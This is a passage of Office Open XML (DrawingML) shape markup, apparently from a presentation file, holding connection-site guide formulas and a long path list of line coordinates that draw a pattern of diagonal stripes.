              <a:gd name="connsiteY800" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX801" fmla="*/ 1366982 w 23952872"/>
              <a:gd name="connsiteY801" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX802" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY802" fmla="*/ 22585888 h 26946982"/>
              <a:gd name="connsiteX803" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY803" fmla="*/ 22705920 h 26946982"/>
              <a:gd name="connsiteX804" fmla="*/ 999919 w 23952872"/>
              <a:gd name="connsiteY804" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX805" fmla="*/ 1119947 w 23952872"/>
              <a:gd name="connsiteY805" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX806" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY806" fmla="*/ 22832918 h 26946982"/>
              <a:gd name="connsiteX807" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY807" fmla="*/ 22952949 h 26946982"/>
              <a:gd name="connsiteX808" fmla="*/ 752907 w 23952872"/>
              <a:gd name="connsiteY808" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX809" fmla="*/ 872924 w 23952872"/>
              <a:gd name="connsiteY809" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX810" fmla="*/ 23952869 w 23952872"/>
              <a:gd name="connsiteY810" fmla="*/ 23079945 h 26946982"/>
              <a:gd name="connsiteX811" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY811" fmla="*/ 23199961 h 26946982"/>
              <a:gd name="connsiteX812" fmla="*/ 505878 w 23952872"/>
              <a:gd name="connsiteY812" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX813" fmla="*/ 625905 w 23952872"/>
              <a:gd name="connsiteY813" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX814" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY814" fmla="*/ 23326960 h 26946982"/>
              <a:gd name="connsiteX815" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY815" fmla="*/ 23446990 h 26946982"/>
              <a:gd name="connsiteX816" fmla="*/ 258854 w 23952872"/>
              <a:gd name="connsiteY816" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX817" fmla="*/ 378882 w 23952872"/>
              <a:gd name="connsiteY817" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX818" fmla="*/ 23952868 w 23952872"/>
              <a:gd name="connsiteY818" fmla="*/ 23573987 h 26946982"/>
              <a:gd name="connsiteX819" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY819" fmla="*/ 23694011 h 26946982"/>
              <a:gd name="connsiteX820" fmla="*/ 11831 w 23952872"/>
              <a:gd name="connsiteY820" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX821" fmla="*/ 131864 w 23952872"/>
              <a:gd name="connsiteY821" fmla="*/ 0 h 26946982"/>
              <a:gd name="connsiteX822" fmla="*/ 23952871 w 23952872"/>
              <a:gd name="connsiteY822" fmla="*/ 23821007 h 26946982"/>
              <a:gd name="connsiteX823" fmla="*/ 23952870 w 23952872"/>
              <a:gd name="connsiteY823" fmla="*/ 23941035 h 2694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Lst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="23952872" h="26946982">
                <a:moveTo>
                  <a:pt x="7" y="26793701"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="153283" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33255" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26913728"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="26546677"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400306" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280280" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26666704"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="26299654"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="647330" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="527302" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26419681"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="26052627"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="894353" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774326" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="26172654"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="25805604"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1141377" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1021350" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="25925631"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="25558583"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1388400" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268373" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="25678610"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="25311557"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1635424" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1515397" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="25431587"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="25064536"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1882447" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1762420" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="25184563"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="24817512"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2129470" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2009444" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24937540"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="24570489"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2376494" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2256467" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24690516"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="24323464"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2623518" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2503491" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24443493"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="24076441"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2870541" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2750514" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="24196469"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="23829417"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3117565" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2997537" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="23949446"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="23582391"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3364588" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3244561" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="23702419"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="23335371"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3611612" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3491585" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="23455398"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="23088347"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3858635" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3738608" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="23208372"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="22841321"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4105659" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3985632" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22961351"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="22594297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4352682" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4232655" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22714327"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="22347277"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4599706" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479679" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22467304"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="22100253"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4846730" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4726702" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="22220280"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="21853230"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5093753" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4973726" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21973257"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5" y="21606206"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5340776" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5220749" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21726233"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="21359182"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5587800" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5467773" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21479210"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="21112156"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5834823" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5714796" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="21232186"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="20865132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6081847" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5961820" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="20985163"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="20618111"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6328871" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6208843" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20738136"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="20371085"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6575894" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6455867" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="20491113"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="20124064"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6822917" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6702890" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="20244092"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="19877044"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7069941" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6949914" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="19997066"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="19630020"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7316966" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7196937" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="19750045"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="19382994"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7563990" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7443961" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="19503024"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="19135973"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7811013" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7690984" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="19256000"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="18888947"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058036" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7938008" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="19008974"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="18641923"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8305060" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8185032" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18761950"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="18394900"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8552084" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8432055" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18514927"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="18147874"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8799107" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8679078" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="18267904"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="17900853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9046131" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8926102" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="18020883"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="17653827"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9293154" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9173126" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17773854"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="17406809"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9540178" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9420151" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="17526833"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="17159782"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9787201" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9667174" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="17279812"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="16912762"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10034225" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9914198" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="17032789"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="16665738"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10281248" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10161221" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16785763"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="16418712"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10528272" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408244" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16538739"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="16171691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10775295" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10655268" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16291716"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15924665"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11022319" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10902292" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="16044692"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15677641"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11269342" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11149315" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15797671"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15430617"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11516366" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11396339" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15550645"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="15183594"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11763389" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11643362" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15303622"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="14936570"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12010413" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11890386" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="15056601"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="14689549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12257436" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12137409" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14809575"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="14442523"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12504459" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12384433" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14562548"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="14195499"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12751483" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12631456" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14315527"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="13948476"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12998507" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12878479" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14068504"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="13701450"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13245530" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13125503" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13821481"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="13454429"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13492554" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13372527" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="13574454"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="13207406"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13739577" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13619550" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13327433"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="12960382"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13986601" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13866574" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13080409"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="12713358"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14233624" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14113597" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12833386"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7" y="12466338"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14480648" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14360621" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="12586359"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="12219312"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14727671" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14607644" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12339339"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="11972285"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14974695" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14854668" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="12092315"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="11725265"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15221718" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15101691" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11845292"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="11478241"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15468742" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15348715" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11598268"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="11231218"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15715765" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15595738" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11351245"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2" y="10984191"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15962789" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15842762" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="11104221"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="10737170"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16209812" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16089785" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10857198"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="10490147"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16456836" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16336809" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10610174"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="10243123"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16703862" y="26946982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16583838" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10363151"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9996100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16950889" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16830861" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="10116127"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9749076"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17197906" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17077879" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9869104"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9502053"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17444930" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17324903" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9622080"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9255029"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17691953" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17571926" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9375057"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="9008006"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17938977" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17818950" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9128033"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8760982"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18186000" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18065973" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8881007"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8513959"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18433024" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18312997" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="8633986"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8266935"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18680047" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18560020" y="26946978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="8386962"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3" y="8019911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18927074" y="26946976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18807046" y="26946976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="8139941"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4" y="7772886"/>
                </a:moveTo>
                <a:lnTo>
